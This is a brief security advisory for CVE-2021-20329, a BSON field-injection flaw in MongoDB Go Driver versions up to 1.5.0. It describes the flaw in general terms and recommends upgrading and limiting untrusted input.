CVE-2021-20329

Name of the Vulnerable Software and Affected Versions: MongoDB Go Driver versions prior to and including 1.5.0

Description: The MongoDB Go Driver has an issue where specific cstrings input may not be properly validated when marshalling Go objects into BSON. This could allow a malicious user to inject additional fields into marshalled documents by using a Go object with a specific string. The issue is due to improper input sanitization when marshalling Go objects into BSON, which could allow an attacker to inject additional fields into a MongoDB document if the package is used to handle untrusted user input.

Recommendations: For MongoDB Go Driver versions prior to and including 1.5.0, update to a version later than 1.5.0 to resolve the issue. As a temporary workaround, consider restricting the use of untrusted user input when marshalling Go objects into BSON until a patch is available. Avoid using the MongoDB Go Driver to handle untrusted user input until the issue is resolved.